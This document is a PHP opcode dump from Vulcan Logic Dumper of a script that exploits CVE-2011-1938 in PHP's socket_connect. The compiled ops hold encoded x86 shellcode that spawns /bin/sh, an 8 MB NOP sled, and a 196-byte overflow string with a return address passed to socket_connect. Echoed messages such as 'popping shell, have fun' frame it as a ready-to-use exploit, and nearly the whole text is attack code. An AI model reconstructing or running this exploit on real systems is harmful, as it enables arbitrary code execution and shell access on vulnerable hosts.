Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 30
Branch analysis from position: 30
2 jumps found. (Code = 44) Position 1 = 33, Position 2 = 25
Branch analysis from position: 33
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 25
2 jumps found. (Code = 44) Position 1 = 33, Position 2 = 25
Branch analysis from position: 33
Branch analysis from position: 25
filename: /in/Aim44
function name: (null)
number of ops: 55
compiled vars: !0 = $SHELLCODE, !1 = $CODE, !2 = $i, !3 = $j, !4 = $b, !5 = $var79, !6 = $var85
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
5 0 E > ECHO '%5B%2B%5D+CVE-2011-1938'
6 1 ECHO '%5B%2B%5D+there+we+go...%0A'
7 2 INIT_FCALL 'define'
3 SEND_VAL 'EVIL_SPACE_ADDR'
4 SEND_VAL '%FF%FF%EE%B3'
5 DO_ICALL
8 6 INIT_FCALL 'define'
7 SEND_VAL 'EVIL_SPACE_SIZE'
8 SEND_VAL 8388608
9 DO_ICALL
9 10 ASSIGN !0, 'j1X%99%CD%80%89%C3%89%C1jFX%CD%80%B0%0BRhn%2Fshh%2F%2Fbi%89%E3%89%D1%CD%80'
13 11 ECHO '%5B%2B%5D+creating+the+sled.%0A'
15 12 INIT_FCALL 'str_repeat'
13 SEND_VAL '%90'
14 FETCH_CONSTANT ~10 'EVIL_SPACE_SIZE'
15 SEND_VAL ~10
16 DO_ICALL $11
17 ASSIGN !1, $11
16 18 ASSIGN !2, 0
19 FETCH_CONSTANT ~14 'EVIL_SPACE_SIZE'
20 STRLEN ~15 !0
21 SUB ~16 ~14, ~15
22 SUB ~17 ~16, 1
23 ASSIGN !3, ~17
24 > JMP ->30
18 25 > FETCH_DIM_R ~20 !0, !2
26 ASSIGN_DIM !1, !3
27 OP_DATA ~20
17 28 PRE_INC !2
29 PRE_INC !3
30 > STRLEN ~23 !0
31 IS_SMALLER !2, ~23
32 > JMPNZ ~24, ->25
21 33 > INIT_FCALL 'str_repeat'
34 SEND_VAL 'A'
35 SEND_VAL 196
36 DO_ICALL $25
37 FETCH_CONSTANT ~26 'EVIL_SPACE_ADDR'
38 CONCAT ~27 $25, ~26
39 ASSIGN !4, ~27
22 40 INIT_FCALL_BY_NAME 'socket_create'
41 FETCH_CONSTANT ~29 'AF_UNIX'
42 SEND_VAL_EX ~29
43 FETCH_CONSTANT ~30 'SOCK_STREAM'
44 SEND_VAL_EX ~30
45 SEND_VAL_EX 1
46 DO_FCALL 0 $31
47 ASSIGN !5, $31
23 48 ECHO '%5B%2B%5D+popping+shell%2C+have+fun+%28if+you+picked+the+right+address...%29%0A'
24 49 INIT_FCALL_BY_NAME 'socket_connect'
50 SEND_VAR_EX !5
51 SEND_VAR_EX !4
52 DO_FCALL 0 $33
53 ASSIGN !6, $33
25 54 > RETURN 1
Generated using Vulcan Logic Dumper, using php 8.0.0